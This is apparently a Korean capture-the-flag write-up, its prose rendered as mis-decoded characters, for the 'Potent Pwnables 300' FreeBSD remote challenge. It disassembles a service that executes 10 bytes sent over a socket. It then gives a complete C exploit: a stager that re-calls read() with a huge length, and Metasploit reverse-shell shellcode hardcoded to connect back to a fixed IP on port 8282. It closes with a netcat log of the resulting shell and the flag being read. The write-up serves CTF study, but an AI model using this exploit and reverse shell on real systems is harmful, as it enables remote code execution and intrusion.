* Potent Pwnables 300 FreeBSD remote exploit ÀÔ´Ï´Ù. pwnage300Àº read() ÇÔ¼ö¸¦ ÅëÇØ »ç¿ëÀÚ¿¡°Ô 10byteÀÇ ÀÔ·ÂÀ» ¹Þ°í, ±× ÇØ´ç Äڵ带 ½ÇÇàÇÏ´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù. debugÇϱ⠾î·Æµµ·Ï signal alarmÀ» ÅëÇØ ÀܸӸ®¸¦ ½áµ×´õ±º¿ä. ÀÌ°Í ¿ª½Ã ÀܸӸ®·Î ¼öÁ¤ÇÏ¿© debug°¡ °¡´ÉÇÕ´Ï´Ù. ÇØ´ç ºÎºÐ ÄÚµåÀÔ´Ï´Ù. -- 8048d9a: 6a 0e push $0xe 8048d9c: e8 67 fc ff ff call 8048a08 8048da1: 83 c4 10 add $0x10,%esp 8048da4: 83 ec 0c sub $0xc,%esp 8048da7: 6a 02 push $0x2 // ±²ÀåÈ÷ ÀλöÇϳ׿ä. 8048da9: e8 ba fb ff ff call 8048968 ... -- socket ÃʱâÈ­ ÈÄ¿¡ fork(), accept()¸¦ °ÅÃÄ Ãë¾àÇÑ ÇÔ¼ö¸¦ È£ÃâÇÏ°Ô µË´Ï´Ù. -- 8048dae: 83 c4 10 add $0x10,%esp 8048db1: 83 ec 0c sub $0xc,%esp 8048db4: ff 75 f0 pushl 0xfffffff0(%ebp) 8048db7: e8 48 00 00 00 call 8048e04 // Ãë¾à ÇÔ¼ö È£Ãâ. -- Ãë¾àÁ¡ÀÌ ÀÖ´Â ÇÔ¼ö¸¦ ºÐ¼®Çغ¸¸é, -- // mmap() È£ÃâÀ» ÅëÇØ ½ÇÇàÇÒ Äڵ带 ÀԷ¹޴ ·çƾ ½ÃÀÛ 8048e16: 6a 00 push $0x0 8048e18: 6a ff push $0xffffffff 8048e1a: 68 11 10 00 00 push $0x1011 8048e1f: 6a 07 push $0x7 8048e21: 68 00 10 00 00 push $0x1000 8048e26: 68 00 60 04 08 push $0x8046000 8048e2b: e8 08 fb ff ff call 8048938 // mmap(0x08046000,0x1000,0x7,0x1011,0xffffffff,0); ... 8048e64: 6a 0a push $0xa 8048e66: ff 75 f8 pushl 0xfffffff8(%ebp) 8048e69: ff 75 08 pushl 0x8(%ebp) 8048e6c: e8 a7 fb ff ff call 8048a18 // read(sock,0x0804600,10); ... 8048e8d: 8b 45 f8 mov 0xfffffff8(%ebp),%eax 8048e90: 89 45 f4 mov %eax,0xfffffff4(%ebp) 8048e93: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 8048e96: ff d0 call *%eax // ÀԷ¹ÞÀº ÄÚµå ½ÇÇà 8048e98: 89 45 f0 mov %eax,0xfffffff0(%ebp) 8048e9b: 83 ec 04 sub $0x4,%esp 8048e9e: 6a 04 push $0x4 8048ea0: 8d 45 f0 lea 0xfffffff0(%ebp),%eax 8048ea3: 50 push %eax 8048ea4: ff 75 08 pushl 0x8(%ebp) 8048ea7: e8 dc fa ff ff call 8048988 // Ä£ÀýÇÏ°Ô ÄÚµå ½ÇÇà °á°ú¸¦ write·Î ¸®ÅÏ -- C·Î ÀçÀÛ¼ºÇغ¸¸é, -- int vuln(int sock){ ... res=mmap(0x08046000,0x1000,0x7,0x1011,0xffffffff,0); if(res==-1){ perror("mmap error"); exit(...); } res=read(sock,0x0804600,10); if(res==-1){ error_function("ERROR reading from socket"); } res=*0x0804600(); write(sock,&res,4); ... } -- º¸½Ã´Ù½ÃÇÇ mmap() À¸·Î ¸ÊÇÎµÈ °ø°£ 0x08046000¿¡ ÄÚµå 10byte¸¦ ¿Ã·ÁµÎ°í ½ÇÇàÇÏ´Â °£´ÜÇÑ ±¸Á¶ÀÔ´Ï´Ù. call *%eax¿¡ ÀÇÇØ È£ÃâµÇ´Â 10byte Äڵ带 ÅëÇØ read() ÇÔ¼ö°¡ ÀԷ¹޴ ũ±â¸¦ Á¶ÀÛÇÒ ¼ö ÀÖ½À´Ï´Ù. -- #1 8048e64: 6a 0a push $0xa #2 8048e66: ff 75 f8 pushl 0xfffffff8(%ebp) #3 8048e69: ff 75 08 pushl 0x8(%ebp) #4 8048e6c: e8 a7 fb ff ff call 8048a18 // read(sock,0x0804600,10); -- #1¹ø¿¡¼­ read() ÇÔ¼öÀÇ ¼¼ ¹ø° ÀÎÀÚÀÎ ÀÔ·Â Å©±â¸¦ ¼³Á¤ÇÏÁÒ. ÀÌ ºÎºÐÀ» ¿ì¸®ÀÇ ÄÚµå·Î ´ëóÇÏ¸é µË´Ï´Ù. %eax ·¹Áö½ºÅÍ´Â call µÉ °ÍÀ̱⠶§¹®¿¡ 0x08046000 ÁÖ¼Ò°¡ ÀÖ°ÚÁÒ. ÀÌ°ÍÀ» stack¿¡ push ÇÏ°í #2¹øÀ» ¼öÇàÇÏ¸é ¾î¶»°Ô µÉ±î¿ä? -- push %eax (0x08046000) push 0x08046000 push sock; call read(); // read(sock,0x08046000,1345004448); -- ¿ì¸®´Â ÀÌ·¸°Ô read() ÇÔ¼öÀÇ 3¹ø° ÀÎÀÚ¸¦ Á¶ÀÛÇÏ¿© 0x08046000 Áï, 1345004448byte ÀÔ·Â °¡´ÉÇÏ°Ô ¸¸µé ¼ö ÀÖ½À´Ï´Ù. °á·ÐÀûÀ¸·Î 10byte °ø°Ý ÄÚµå´Â ´ÙÀ½°ú °°½À´Ï´Ù. -- "\x50" // push %eax "\x68\x66\x8e\x04\x08" // push $0x08048e66 #2 ¹øÀ¸·Î °¡±â À§ÇØ. "\xc3" // ret (pop %eip) "\x82\x82\x82" // 10byte¸¦ ¸ÂÃçÁÖ±â À§ÇÑ pad -- ´ÙÀ½Àº exploit ÀÔ´Ï´Ù. -- /* ** ** 0x82-eat_pwnage300.c - Potent Pwnables 300 remote exploit by x82 ** ** pwnage300 exploit: -- ** [x82@x0x x82]$ nc -l -p 8282 ** /bin/sh -i ** sh: can't access tty; job control turned off ** $ id ** uid=2002(pwnage300) gid=2002(pwnage300) groups=2002(pwnage300) ** $ cat /home/pwnage300/key ** ViAgR@ 4 ur shellcode ** $ exit ** [x82@x0x x82]$ ** -- ** */ #include #include #include #include #include #include int main(int argc,char *argv[]){ unsigned char janmury[]= "\x50" // push %eax read() ÇÔ¼öÀÇ ¼¼ ¹ø° ÀÎÀÚ¸¦ 0x08046000(%eax) ¸¸Å­ ¹Þ°Ô ¸¸µë. "\x68\x66\x8e\x04\x08" // push $0x08048e66 read() È£ÃâºÎ·Î ³Ñ¾î°¥ Áغñ "\xc3" // ret (pop %eip) read() È£ÃâºÎ ÁÖ¼Ò·Î ¸®ÅÏ "\x82\x82\x82" // pad /* 0x08048e66: pushl 0xfffffff8(%ebp) 0x08048e69: pushl 0x8(%ebp) 0x08048e6c: call 8048a18 read(sock,0x0804600,10); ÀÌ·¸°Ô ¸®ÅÏÇϸé, 10byte¸¦ 3¹ø° ÀÎÀÚ·Î ¾²´ø ÄÚµå ´ë½Å¿¡ 1345004448 (0x08046000)¸¸Å­ ÀԷ¹޵µ·Ï ¸¸µé ¼ö ÀÖÀ¸¹Ç·Î, Å« shellcode ÀÔ·ÂÀÌ °¡´ÉÇØ Áü. read(sock,0x08046000,1345004448); */ ; /* 8282¹øÀ¸·Î Á¢¼ÓÇÏ´Â metasploit ¸®¹ö½º ½©ÄÚµå (½©ÄÚµå ¸¸µé ½Ã°£ÀÌ ¾ø¾î¼­ -_¤Ð) */ /* bsd_ia32_reverse - LHOST=221.154.133.30 LPORT=8282 Size=92 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x29\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0b" "\xe2\x2e\xc3\x83\xeb\xfc\xe2\xf4\x61\x83\x76\x5a\x59\xa0\x7c\x81" "\x59\x8a\xf3\x59\x8e\xfc\xe3\x43\x63\xf2\x2c\xe3\x51\x6b\xcf\xa9" "\x1b\xb3\x7e\x92\x9c\x88\x4c\x9b\xc6\x62\x44\xc1\x52\x52\x74\x92" "\x5c\xb3\xe3\x43\x42\x9b\xd8\x93\x63\xcd\x01\xb0\x63\x8a\x01\xa1" "\x62\x8c\xa7\x20\x5b\xb6\x7d\x90\xbb\xd9\xe3\x43"; struct hostent *se; struct sockaddr_in saddr; int sock; int i; printf("\nPotent Pwnables 300 remote exploit by x82\n\n"); if(argc<3){ printf("Usage: %s [host] [port]\n",argv[0]); exit(-1); } se=gethostbyname(argv[1]); if(se==NULL){ return -1; } sock=socket(AF_INET,SOCK_STREAM,0); if(sock==-1){ return -1; } saddr.sin_family=AF_INET; saddr.sin_port=htons(atoi(argv[2])); saddr.sin_addr=*((struct in_addr *)se->h_addr); bzero(&(saddr.sin_zero),8); i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr)); if(i==-1){ return -1; } // °ø°Ý ´ë»ó ¹ÙÀ̳ʸ®¿¡¼­ alarmÀÇ ÀÎÀÚ¸¦ 0xff·Î ¼öÁ¤ÇÏ¸é µð¹ö±ëÀÌ °¡´É. // sleep(10); send(sock,janmury,strlen(janmury),0); send(sock,scode,strlen(scode),0); close(sock); } /* eoc */ -- °ø°Ý °á°ú: -- [x82@x0x x82]$ nc -l -p 8282 /bin/sh -i sh: can't access tty; job control turned off $ id uid=2002(pwnage300) gid=2002(pwnage300) groups=2002(pwnage300) $ cat /home/pwnage300/key ViAgR@ 4 ur shellcode $ exit [x82@x0x x82]$